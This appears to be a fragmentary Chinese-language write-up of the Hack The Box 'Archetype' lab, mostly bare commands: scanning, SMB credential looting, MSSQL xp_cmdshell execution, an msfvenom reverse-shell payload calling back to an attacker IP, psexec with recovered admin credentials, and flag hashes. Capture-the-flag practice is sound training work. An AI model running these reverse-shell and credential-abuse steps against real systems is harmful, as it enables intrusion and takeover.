是的!我買ㄌ Hack The Box 的 VIP+,因為我覺得 Try Hack Me 上面的 Windows 題目都太新手不友善了,相較之下, Hack The Box 的 Windows 題目比較多元,所以今天開始我應該都會來玩 Hack The Box 的題目! 官方說這題是 Very Easy,但我個人卻覺得有一點小難QQ。
rustscan -a 10.10.10.27 -r 1-65535
nmap -A -p135,139,445,5985,47001,49664,49665,49666,49667,49669,49668 10.10.10.27
SMB 匿名登入
backups
backups 資料夾
取得密碼資訊
ARCHETYPE
sql_svc
M3g4c0rp123
sudo apt install python3-impacket
impacket-mssqlclient -p 1433 sql_svc@10.10.10.27 -windows-auth
exec xp_cmdshell '{指令}'
systeminfo
dir
exec xp_cmdshell 'dir'
impacket-smbserver meow .
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.16 LPORT=7877 -e x86/shikata_ga_nai -f exe > shell.exe
x86/shikata_ga_nai
就會被 Defender 吃掉exec xp_cmdshell '\\10.10.16.16\meow\shell.exe'
3e7b102e78218e935bf3f4951fec21a3
windows-exploit-suggester.py
whoami /priv
%userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
administrator
MEGACORP_4dm1n!!
impacket-psexec administrator:'MEGACORP_4dm1n!!'@10.10.10.27
b91ccec3305e98240082d4474b848528